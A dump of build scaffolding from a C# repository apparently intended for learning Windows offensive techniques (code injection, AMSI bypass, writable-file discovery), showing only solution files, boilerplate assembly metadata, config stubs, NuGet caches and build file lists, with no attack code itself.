Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "virtualallocex_remoteprocess", "virtualallocex_remoteprocess\virtualallocex_remoteprocess.csproj", "{63E342F3-25ED-4624-8E6D-1154911CDC0D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {63E342F3-25ED-4624-8E6D-1154911CDC0D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {63E342F3-25ED-4624-8E6D-1154911CDC0D}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {63E342F3-25ED-4624-8E6D-1154911CDC0D}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {63E342F3-25ED-4624-8E6D-1154911CDC0D}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {01C2700A-9201-42D2-92F5-40D47BB22B6C} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("virtualallocex_remoteprocess")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("virtualallocex_remoteprocess")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("63e342f3-25ed-4624-8e6d-1154911cdc0d")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/bin/Debug/virtualallocex_remoteprocess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/bin/Debug/virtualallocex_remoteprocess.exe -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/bin/Debug/virtualallocex_remoteprocess.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/bin/Debug/virtualallocex_remoteprocess.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/bin/Debug/virtualallocex_remoteprocess.pdb -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/virtualallocex_remoteprocess.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\virtualallocex_remoteprocess\virtualallocex_remoteprocess\bin\Debug\virtualallocex_remoteprocess.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\virtualallocex_remoteprocess\virtualallocex_remoteprocess\bin\Debug\virtualallocex_remoteprocess.exe 3 | C:\Users\stargirl\source\repos\WinAPI\virtualallocex_remoteprocess\virtualallocex_remoteprocess\bin\Debug\virtualallocex_remoteprocess.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\virtualallocex_remoteprocess\virtualallocex_remoteprocess\obj\Debug\virtualallocex_remoteprocess.exe 5 | C:\Users\stargirl\source\repos\WinAPI\virtualallocex_remoteprocess\virtualallocex_remoteprocess\obj\Debug\virtualallocex_remoteprocess.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\virtualallocex_remoteprocess\virtualallocex_remoteprocess\obj\Debug\virtualallocex_remoteprocess.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/virtualallocex_remoteprocess.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/virtualallocex_remoteprocess.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/virtualallocex_remoteprocess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/virtualallocex_remoteprocess.exe -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/virtualallocex_remoteprocess.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/virtualallocex_remoteprocess/obj/Debug/virtualallocex_remoteprocess.pdb -------------------------------------------------------------------------------- /Get-WritableFiles/.vs/Get-Writable/DesignTimeBuild/.dtbcache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/.vs/Get-Writable/DesignTimeBuild/.dtbcache -------------------------------------------------------------------------------- /Get-WritableFiles/.vs/Get-Writable/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/.vs/Get-Writable/v16/.suo -------------------------------------------------------------------------------- /Get-WritableFiles/.vs/Get-Writable/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/.vs/Get-Writable/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Get-WritableFiles/.vs/Get-Writable/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/.vs/Get-Writable/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Get-Writable", "Get-Writable\Get-Writable.csproj", "{4903FFD5-E114-45CB-9DC1-BA5760274F7E}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {4903FFD5-E114-45CB-9DC1-BA5760274F7E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {4903FFD5-E114-45CB-9DC1-BA5760274F7E}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {4903FFD5-E114-45CB-9DC1-BA5760274F7E}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {4903FFD5-E114-45CB-9DC1-BA5760274F7E}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {A90C3F7C-2F12-45C5-AD92-98C1EA1A85C0} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/Get-Writable.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | net48 5 | Get_Writable 6 | 7 | Exe 8 | 9 | 10 | 11 | 12 | true 13 | full 14 | true 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/bin/Debug/net48/Get-Writable.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/Get-Writable/bin/Debug/net48/Get-Writable.exe -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/bin/Debug/net48/Get-Writable.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/bin/Debug/net48/Get-Writable.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/Get-Writable/bin/Debug/net48/Get-Writable.pdb -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("Get-Writable")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("Get-Writable")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("Get-Writable")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | b80384fcdbe227e38f683f49b48158d1962ef7f4 2 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.assets.cache -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\Get-Writable\Get-Writable\bin\Debug\net48\Get-Writable.exe.config 2 | C:\Users\stargirl\source\repos\Get-Writable\Get-Writable\bin\Debug\net48\Get-Writable.exe 3 | C:\Users\stargirl\source\repos\Get-Writable\Get-Writable\bin\Debug\net48\Get-Writable.pdb 4 | C:\Users\stargirl\source\repos\Get-Writable\Get-Writable\obj\Debug\net48\Get-Writable.AssemblyInfoInputs.cache 5 | C:\Users\stargirl\source\repos\Get-Writable\Get-Writable\obj\Debug\net48\Get-Writable.AssemblyInfo.cs 6 | C:\Users\stargirl\source\repos\Get-Writable\Get-Writable\obj\Debug\net48\Get-Writable.exe 7 | C:\Users\stargirl\source\repos\Get-Writable\Get-Writable\obj\Debug\net48\Get-Writable.pdb 8 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.exe -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.exe.withSupportedRuntime.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/Get-Writable/obj/Debug/net48/Get-Writable.pdb -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/netstandard2.0/Get-Writable.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("Get-Writable")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("Get-Writable")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("Get-Writable")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/netstandard2.0/Get-Writable.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | b80384fcdbe227e38f683f49b48158d1962ef7f4 2 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/netstandard2.0/Get-Writable.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/Get-Writable/obj/Debug/netstandard2.0/Get-Writable.assets.cache -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Debug/netstandard2.0/Get-Writable.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Get-WritableFiles/Get-Writable/obj/Debug/netstandard2.0/Get-Writable.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Get-Writable.csproj.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 1, 3 | "dgSpecHash": "EcG6Q2xCZSfcJWg4Bm+EOoWfc4x7uFPPHINbpkkt+ZlSn9K4OYCoREz5QtYoTLCqJ4uizRi0hJOzs5sLeHAytA==", 4 | "success": true 5 | } -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Get-Writable.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\Get-Writable.csproj": {} 5 | }, 6 | "projects": { 7 | "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\Get-Writable.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\Get-Writable.csproj", 11 | "projectName": "Get-Writable", 12 | "projectPath": "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\Get-Writable.csproj", 13 | "packagesPath": "C:\\Users\\stargirl\\.nuget\\packages\\", 14 | "outputPath": "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\obj\\", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "C:\\Users\\stargirl\\AppData\\Roaming\\NuGet\\NuGet.Config", 18 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" 19 | ], 20 | "originalTargetFrameworks": [ 21 | "net48" 22 | ], 23 | "sources": { 24 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, 25 | "https://api.nuget.org/v3/index.json": {} 26 | }, 27 | "frameworks": { 28 | "net48": { 29 | "projectReferences": {} 30 | } 31 | }, 32 | "warningProperties": { 33 | "warnAsError": [ 34 | "NU1605" 35 | ] 36 | } 37 | }, 38 | "frameworks": { 39 | "net48": { 40 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\3.0.100\\RuntimeIdentifierGraph.json" 41 | } 42 | }, 43 | "runtimes": { 44 | "win7-x86": { 45 | "#import": [] 46 | } 47 | } 48 | } 49 | } 50 | } -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Get-Writable.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | $(UserProfile)\.nuget\packages\ 8 | C:\Users\stargirl\.nuget\packages\ 9 | PackageReference 10 | 5.3.0 11 | 12 | 13 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 14 | 15 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/Get-Writable.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /Get-WritableFiles/Get-Writable/obj/project.assets.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": 3, 3 | "targets": { 4 | ".NETFramework,Version=v4.8": {}, 5 | ".NETFramework,Version=v4.8/win7-x86": {} 6 | }, 7 | "libraries": {}, 8 | "projectFileDependencyGroups": { 9 | ".NETFramework,Version=v4.8": [] 10 | }, 11 | "packageFolders": { 12 | "C:\\Users\\stargirl\\.nuget\\packages\\": {} 13 | }, 14 | "project": { 15 | "version": "1.0.0", 16 | "restore": { 17 | "projectUniqueName": "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\Get-Writable.csproj", 18 | "projectName": "Get-Writable", 19 | "projectPath": "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\Get-Writable.csproj", 20 | "packagesPath": "C:\\Users\\stargirl\\.nuget\\packages\\", 21 | "outputPath": "C:\\Users\\stargirl\\source\\repos\\Get-Writable\\Get-Writable\\obj\\", 22 | "projectStyle": "PackageReference", 23 | "configFilePaths": [ 24 | "C:\\Users\\stargirl\\AppData\\Roaming\\NuGet\\NuGet.Config", 25 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" 26 | ], 27 | "originalTargetFrameworks": [ 28 | "net48" 29 | ], 30 | "sources": { 31 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, 32 | "https://api.nuget.org/v3/index.json": {} 33 | }, 34 | "frameworks": { 35 | "net48": { 36 | "projectReferences": {} 37 | } 38 | }, 39 | "warningProperties": { 40 | "warnAsError": [ 41 | "NU1605" 42 | ] 43 | } 44 | }, 45 | "frameworks": { 46 | "net48": { 47 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\3.0.100\\RuntimeIdentifierGraph.json" 48 | } 49 | }, 50 | "runtimes": { 51 | "win7-x86": { 52 | "#import": [] 53 | } 54 | } 55 | } 56 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Offensive-C-Sharp 2 | 3 | ## I wrote these while learning AD Pentesting and windows hacking 4 | -------------------------------------------------------------------------------- /amsipatch64/.vs/amsibypass/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/.vs/amsibypass/v16/.suo -------------------------------------------------------------------------------- /amsipatch64/.vs/amsibypass/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/.vs/amsibypass/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /amsipatch64/.vs/amsibypass/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/.vs/amsibypass/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /amsipatch64/.vs/amsibypass/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/.vs/amsibypass/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /amsipatch64/.vs/amsibypass/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/.vs/amsibypass/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /amsipatch64/amsibypass.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "amsipatch64", "amsibypass\amsipatch64.csproj", "{B4757267-1849-4CF7-A20E-F4104C6DF7D1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {B4757267-1849-4CF7-A20E-F4104C6DF7D1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {B4757267-1849-4CF7-A20E-F4104C6DF7D1}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {B4757267-1849-4CF7-A20E-F4104C6DF7D1}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {B4757267-1849-4CF7-A20E-F4104C6DF7D1}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {5725F164-DEDB-44C0-8992-FACD020F6BC8} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /amsipatch64/amsibypass/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /amsipatch64/amsibypass/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("amsibypass")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("amsibypass")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("b4757267-1849-4cf7-a20e-f4104c6df7d1")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /amsipatch64/amsibypass/bin/Debug/amsibypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/amsibypass/bin/Debug/amsibypass.exe -------------------------------------------------------------------------------- /amsipatch64/amsibypass/bin/Debug/amsibypass.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /amsipatch64/amsibypass/bin/Debug/amsibypass.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/amsibypass/bin/Debug/amsibypass.pdb -------------------------------------------------------------------------------- /amsipatch64/amsibypass/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/amsibypass/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /amsipatch64/amsibypass/obj/Debug/amsibypass.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\bin\Debug\amsibypass.exe.config 2 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\bin\Debug\amsibypass.exe 3 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\bin\Debug\amsibypass.pdb 4 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\obj\Debug\amsibypass.exe 5 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\obj\Debug\amsibypass.pdb 6 | -------------------------------------------------------------------------------- /amsipatch64/amsibypass/obj/Debug/amsibypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/amsibypass/obj/Debug/amsibypass.exe -------------------------------------------------------------------------------- /amsipatch64/amsibypass/obj/Debug/amsibypass.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/amsibypass/obj/Debug/amsibypass.pdb -------------------------------------------------------------------------------- /amsipatch64/amsibypass/obj/Debug/amsipatch64.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\bin\Debug\amsibypass.exe.config 2 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\bin\Debug\amsibypass.exe 3 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\bin\Debug\amsibypass.pdb 4 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\obj\Debug\amsipatch64.csprojAssemblyReference.cache 5 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\obj\Debug\amsibypass.exe 6 | C:\Users\stargirl\source\repos\amsibypass\amsibypass\obj\Debug\amsibypass.pdb 7 | C:\Users\stargirl\source\repos\amsibypass\amsipatch64\amsibypass\bin\Debug\amsibypass.exe.config 8 | 